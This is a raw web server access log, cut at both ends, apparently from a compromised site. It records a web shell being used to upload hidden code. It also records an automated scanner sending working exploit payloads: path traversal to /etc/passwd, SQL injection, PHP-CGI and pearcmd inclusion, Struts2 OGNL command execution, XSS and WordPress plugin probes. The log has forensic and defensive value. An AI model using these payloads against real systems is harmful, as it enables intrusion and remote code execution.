AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:13 -0400] "GET /640275/about.php?ac=p&api=http://6146-ch4-v288.img7yahoo.com&path=84421486888f873a2c81bee9250ef98a&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 36 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:18 -0400] "GET /640275/about.php?ac=i_old_v4&api=http://6146-ch4-v288.img7yahoo.com&path=/home/megavujh/mgrokokbet.id&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 21 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:41:55 -0400] "GET /640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id HTTP/1.1" 200 958 "https://mgrokokbet.id/640275/about.php?p=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet.id" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:42:00 -0400] "POST 
/640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id HTTP/1.1" 200 978 "https://mgrokokbet.id/640275/about.php?upload&q=%E0%A6%95home%E0%A6%95megavujh%E0%A6%95mgrokokbet%E0%A6%97id" "ShellBot 2.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:43:11 -0400] "GET /640275/about.php?ac=u-about&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:45:27 -0400] "GET /about.php?ac=upload_hidden_code&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 199.168.98.202 - - [23/Apr/2025:21:47:19 -0400] "GET /640275/about.php?ac=upload_hidden_code&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:36 -0400] "POST /guest_auth/guestIsUp.php HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - 
[23/Apr/2025:23:39:37 -0400] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [23/Apr/2025:23:39:37 -0400] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /bsh.servlet.BshServlet HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /mobile/plugin/browser.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 
Mobile/15E148 Safari/604.1" 154.84.62.234 - - [23/Apr/2025:23:39:38 -0400] "POST /zentao/user-login.html HTTP/1.1" 200 0 "https://mgrokokbet.id/zentao/user-login.html" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - guest [23/Apr/2025:23:39:38 -0400] "POST /WEB_VMS/LEVEL15/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /BOCB6GUjxZbF.jsp?error=bsh.Interpreter HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /cgi-bin/rpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /seeyon/htmlofficeservlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.35" 154.84.62.234 - - [23/Apr/2025:23:39:40 -0400] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.24" 154.84.62.234 - - [23/Apr/2025:23:39:44 -0400] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:39:44 -0400] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 0 
"-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:45 -0400] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:45 -0400] "GET /seeyon/test123456.jsp?pwd=asasd3344&2w9rfc7PVHkWEq55m9su1RnRuAS=ipconfig HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.5.20" 154.84.62.234 - - [23/Apr/2025:23:39:42 -0400] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:39:47 -0400] "GET /public/index.php/home/file/user_pics HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [23/Apr/2025:23:39:48 -0400] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" 154.84.62.234 - - [23/Apr/2025:23:41:51 -0400] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [23/Apr/2025:23:41:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [23/Apr/2025:23:41:57 -0400] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+iQC0Xf4xCI.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [23/Apr/2025:23:57:40 -0400] "GET 
/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [23/Apr/2025:23:57:40 -0400] "POST /index.php/User/doLogin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:00:05:37 -0400] "GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:00:05:37 -0400] "POST /scripts/setup.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /axis2/axis2-admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:00:05:38 -0400] "POST /axis2-admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 154.84.62.234 - - [24/Apr/2025:00:05:40 -0400] "POST /login.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:06:22 -0400] "GET /login-x.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:06:22 -0400] "GET 
/users/sign_in HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:09:39 -0400] "POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:12:29 -0400] "GET /reports/rwservlet/showenv HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:00:12:29 -0400] "GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.20" 154.84.62.234 - - [24/Apr/2025:00:12:32 -0400] "GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:12:32 -0400] "GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:00:20:52 -0400] "POST /user.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.20" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:00:21:53 -0400] "GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET 
/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 
154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; 
rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:00:22:02 -0400] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:23:27 -0400] "GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:00:26:12 -0400] "GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:00:26:12 -0400] "GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 ZOE/2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:13 -0400] "GET 
/wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:26:14 -0400] "GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:00:26:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:00:26:21 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:00:26:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19" 154.84.62.234 - - 